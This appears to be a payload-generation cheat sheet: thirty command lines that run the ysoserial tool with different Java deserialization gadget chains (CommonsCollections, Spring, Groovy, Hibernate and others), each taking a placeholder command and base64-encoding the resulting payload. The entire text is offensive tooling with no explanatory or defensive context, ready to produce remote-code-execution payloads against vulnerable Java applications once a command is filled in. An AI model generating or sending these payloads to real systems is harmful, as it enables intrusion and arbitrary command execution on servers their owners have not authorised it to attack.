java -jar ysoserial.jar AspectJWeaver '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar BeanShell1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar C3P0 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Click1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Clojure '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar CommonsBeanutils1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar CommonsCollections1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar CommonsCollections2 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar CommonsCollections3 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar CommonsCollections4 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar CommonsCollections5 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar CommonsCollections6 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar CommonsCollections7 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Groovy1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Hibernate1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Hibernate2 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar JBossInterceptors1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar JSON1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar JavassistWeld1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Jdk7u21 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Jython1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar MozillaRhino1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar MozillaRhino2 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Myfaces1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Myfaces2 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar ROME '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Spring1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Spring2 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Vaadin1 '[PROVIDE_COMMAND]' | base64 -w0
java -jar ysoserial.jar Wicket1 '[PROVIDE_COMMAND]' | base64 -w0
